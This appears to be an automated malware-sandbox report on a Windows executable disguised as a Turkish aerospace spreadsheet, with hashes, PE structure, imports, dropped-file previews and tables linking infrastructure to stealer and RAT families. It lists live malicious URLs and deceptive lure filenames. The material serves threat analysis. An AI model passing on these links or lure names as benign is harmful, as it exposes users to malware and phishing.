CLOUDFLARENETUS | https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://protect.checkpoint.com/v2/r02/___https://url1251.popmenu.com/qxdhqnhp?zus=z556.WRHPCjsgt/tA51B6LI9w4BubTYwM5p/-7KrggkVEpmPU5/oVFKKM8Rk6rAnqtQtILc2Q2H_3u9DiXC41Sfynx8MyN*~*gGwOol/aO3BY*~*pgD37kbc4-7KGmCSO4DHGqcB*~*D2S053knP-7G*~*y37ScDgrX/lhFDF7r7h5Gwz-7GtvZLu*~*h33zX5RXwSF0oDJX34CSZAvVXm4AFQJ-7Gq-7KxI/mcm4qvQmbxushMLQI9uHWfHKaPI5mifSCu5iVBRcvqUxu7JB4CzzH*~*tp7hI*~*P2JxcRqKbjQDa1m4EV2vJju-7KXGYhKkA/NMg4b3nlprWADF7NLfLtJTf5xKVlxz1PBE*~*XIwKJANjSZxzJHsTEzwI07xTpBPmh9cjRp3bNxF-8I___.YzJlOm1zbm90aWZ5OmM6bzphNDQ0NjUwYTgwNjk4YzE1YzQzODY0NjgzZWZkNGFjNzo3Ojk1N2U6NjEyMTFiMTNiOTljZDFhYmUzOWRiNzM5NDE0NGE3NDNhMDJkZjlhMmI1NzgzMzhlZTAwMjhmZTBkODVlNWNmZDpoOlQ6VA | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, DCRat, LummaC Stealer, PureLog Stealer | 172.67.220.198
CLOUDFLARENETUS | https://login.corp-internal.org/17058d3d8656ed69?l=27 | malicious | Unknown | 104.16.99.29
CLOUDFLARENETUS | https://www.sendspace.com/pro/dl/m2hhc1 | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | rQuotation.exe | malicious | Lokibot, PureLog Stealer | 172.67.153.63
CLOUDFLARENETUS | https://afw.soundestlink.com/ce/c/675c127e5a5226f9e7b86686/675c13ae85cd17d1e3e2ab54/675c13c9f9a08fb1fbb3e577?signature=3f4d77f7452e61cf1e0cb9ce4a3540d02af0944caf975b089573a2fc1d891103 | malicious | Unknown | 172.67.163.209
CLOUDFLARENETUS | http://898.tv/Lantekqs | malicious | Unknown | 104.16.62.16
CLOUDFLARENETUS | Herinnering.msg | malicious | Unknown | 172.66.0.227
ORACLE-BMC-31898US | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 158.101.44.242
ORACLE-BMC-31898US | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | arm5.elf | malicious | Unknown | 147.154.242.4
ORACLE-BMC-31898US | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | 193.122.130.0
ORACLE-BMC-31898US | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | elitebotnet.x86.elf | malicious | Mirai, Okiru | 140.204.52.53
ORACLE-BMC-31898US | 77541373_BESOZT00_2024_99101234_1_4_1.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | AsyncClient.exe | malicious | AsyncRAT, HVNC, PureLog Stealer | 193.122.130.0
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exe | malicious | GuLoader | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | SWIFT091816-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | Tvl72VM6PM.exe | malicious | Unknown | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | Tvl72VM6PM.exe | malicious | Unknown | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | file.exe | malicious | Snake Keylogger | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
54328bd36c14bd82ddaa0c04b25ed9ad | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | 104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e | PO.bat.exe | malicious | AgentTesla, GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | rQuotation.exe | malicious | Lokibot, PureLog Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | invoice.html | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | rDOC24INV0616.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | https://t.co/eSJUUrWOcO | malicious | HTMLPhisher | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | InvoiceNr274728.pdf.lnk | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | A6IuJ5NneS.lnk | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | KlarnaInvoice229837.pdf.lnk | malicious | LummaC | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Arrival Notice.vbs | malicious | Remcos, GuLoader | 149.154.167.220
No context

Process: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type: data
Category: dropped
Size (bytes): 131260
Entropy (8bit): 7.927629359842594
Encrypted: false
SSDEEP: 3072:GXd3q/RvJrnoMEIY3o+VoHWZVCnMinmUysUXuimfTU:Wa9JLKon0SiqTU
MD5: B786E54FFB3DE50B5154B4255F156F4A
SHA1: 387972FA1376F21A589E0C54473EC0961A2792EE
SHA-256: A7442736F4CD5413DBB215DCCEA715ED6A1C5AE952AB4B7639A95F34416265AE
SHA-512: DE1DFC2B55C97353C5133E5F8065081558F4C9BBF1021B7CCB348619FF107E0DAD8A2D3633381A70C8091A3F65B13B2114EAAF7DA94B031F923B4CDA278D954D
Malicious: false
Reputation: low
Preview: EA06..0........oD..&u]n.sD.L.t.}2.U.L@.J...R..h.@.\...~.X..O.b....7)m..#.H.B.Z.Z...t.P.E...vu&...1J..Io...K../).J*..Rg`.T...1...g....4.CU.L'Sh.f.)..2..\D.5..."..C&....4......Vh.'...F...Vd.+..V%..$.:]h...Lf2p..R@4.9....V3=.H.`..5RoK..~|."?@....:.h.W....o..*.w)..@...p......H.T.o ..vs9....I4...4..._O.~."."%..V..e...d.U..*.p.B.0...!.:.@.....T.....*Si.J..U3..8..X.T.M&t.WV.A..~..*g..........W...Zi7.....:..!..DT......`.R..T[......O.T%..D..P......B...M...`.I*...T.e.......Z.2sU.e.Vi...S(5..Jc7.vi.:.ZU..M'<.M>.E.Ef3....D..o.$.gN.S...|.e..4.D..Y.....~.L..Qy...c.L..+.~.7....ej........2o..J..I.....~$3...k..*..<..p....[t..0..c.K...Y.Vg...f.4..I...nSF..@$.nu:....Je..N.Lf...23K.vf.I...h.......;f..@........@*.UV5...(..Db.x....I.>.O.X.rY..go..2.%fs@.............Lyu ...6....omfg%.....\....f3....v.........S..{.zcO..4.....:..T..~.@..f.J../K.Jb9@.R...Pjs..oF...uZ.fwG..t.]:.(..I..}2c...*..=..I.P.)..{D..7.@.)...1..e..Q.*`......M.4......Mi.P..3.V.....IM..:.*..u...%....a

Process: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type: SVr2 curses screen image, big-endian
Category: dropped
Size (bytes): 274432
Entropy (8bit): 6.837989100231251
Encrypted: false
SSDEEP: 6144:hOCWm/dAZdjO0aHta8ZIuaqe6a2EauSVVmaXYFn1rnU:8CWm1ajO1ta9DsuSmp1rnU
MD5: 6880758A850062FD30B92F05A84AF4A2
SHA1: DF25C701A9C45EF5F737A6A85565D25C6305E761
SHA-256: 43D57E4EB75AD957405A8CD679AC2BFE0A2DB85364894767BB2921117F45512C
SHA-512: 5B2049D90942B03C0025782877A8AE77C8738F7DB1D5CB6268FE7046901B8108A28D9D7A38C28FFC09624DCB162CF6C0072CA6A77853F1A5DF75288ECC9871C8
Malicious: false
Reputation: low
Preview: ...0217D]L3U..9D.3KJOLAUp117DYL3URY9D43KJOLAU0117DYL3URY9D43.JOLOJ.?1.M.m.T....\Z8j?>.2BP\.'8"]:&y[!.A>$o%/ut~b.)6(V{_T3`43KJOLA.u11{EZL...?9D43KJOL.U20:6.YL)QRY-D43KJO.yQ01.7DY.7URYyD4.KJONAU4117DYL3QRY9D43KJ.HAU2117DYL1U..9D$3KZOLAU 11'DYL3URI9D43KJOLAU09.3D.L3UR.=D##KJOLAU0117DYL3URY9DT7KFOLAU0117DYL3URY9D43KJOLAU0117DYL3URY9D43KJOLAU0117DYl3UZY9D43KJOLAU8.17.YL3URY9D43Kd;)9!011S\]L3uRY9^03KHOLAU0117DYL3URy9DT.99=/AU0&!7DY.7URK9D4/OJOLAU0117DYL3.RYyjFV'%,LAY0117$]L3WRY9j03KJOLAU0117DY.3U.Y9D43KJOLAU0117D.t7URY9D|3KJMLDU..374.M3VRY9.43M..NA.0117DYL3URY9D43KJOLAU0117DYL3URY9D43KJOLAU0.L.K...<!..D43KJOMCV479?DYL3URY9:43K.OLA.011.DYL.URYTD43oJOL?U01O7DY(3UR+9D4RKJO.AU0^17D7L3U,Y9D*1cjOLK..13.eYL9Ux.Jf43A.NLAQC.17N.N3UV*.D49.IOLE&.11=.]L3Q!.9D>.NJOHk.02.!BYL(:kY9N40._ILAN..15lcL3_Rs.D7.^LOLZ..13.MYL7..*$D45c.OLK!9115.SL3QxG;lp3K@en?^015.DsnMYRY=o4.i4BLAQ.1.)F.A3UVs.::3KNdLkwN>17@rL.KP.6D47ah1\AU4.1.f']3UVr9n.MYJOHjU..O$DYH.Ux{GP43OaOfc+%113oYf.+DY9@.3ah1[AU4.1.f'T3UVr9n*1.ROLE.6.S76.Y3%Q
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.016512045433539
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File size: 1'029'120 bytes
MD5: e984d47ddddd227739d93d4712eec8fa
SHA1: c10c8fbb4afc6d0ec5754ee95cfd4b3e4df4b3f8
SHA256: 1349316e7a40b141bed9b55a8271d86434e168ff6efd248c1fa5af4e05c1c248
SHA512: 67c5fe2605be68f0f35193df1186924ee34fe3c1d65909bcdb34def6863f07aa9b444064690080a8e018efae9e1ac08c26442364d1a3e2488ebf932f8e05c643
SSDEEP: 24576:cu6J33O0c+JY5UZ+XC0kGso6FacEjfddHksiaZhdcWY:Gu0c++OCvkGs9Facqf/iafY
TLSH: 9A25BE22B3DDC360CB669173BF69B3056EBF7C610630B85B2F980D79A950171266C7A3
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: 3570b480858580c5
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675FC424 [Mon Dec 16 06:09:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007FE88501226Ah
jmp 00007FE885005034h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE8850051BAh
cmp edi, eax
jc 00007FE88500551Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FE8850051B9h
rep movsb
jmp 00007FE8850054CCh
cmp ecx, 00000080h
jc 00007FE885005384h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE8850051C0h
bt dword ptr [004BE324h], 01h
jc 00007FE885005690h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FE88500535Dh
test edi, 00000003h
jne 00007FE88500536Eh
test esi, 00000003h
jne 00007FE88500534Dh
bt edi, 02h
jnc 00007FE8850051BFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE8850051C3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE885005215h
bt esi, 03h
jnc 00007FE885005268h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x32a58 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x32a58 | 0x32c00 | 3749d4297d05ed808fab04e96093e91b | False | 0.9559392318349754 | data | 7.930009937809749 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfa000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc7458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc7580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc76a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc77d0 | 0x162c | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.906800563777308
RT_MENU | 0xc8dfc | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xc8e4c | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xc93e0 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xc9a6c | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xc9efc | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xca4f8 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcab54 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcafbc | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcb114 | 0x2e425 | data | | | 1.0003483272376066
RT_GROUP_ICON | 0xf953c | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0xf9550 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xf9564 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xf9578 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xf958c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xf9668 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
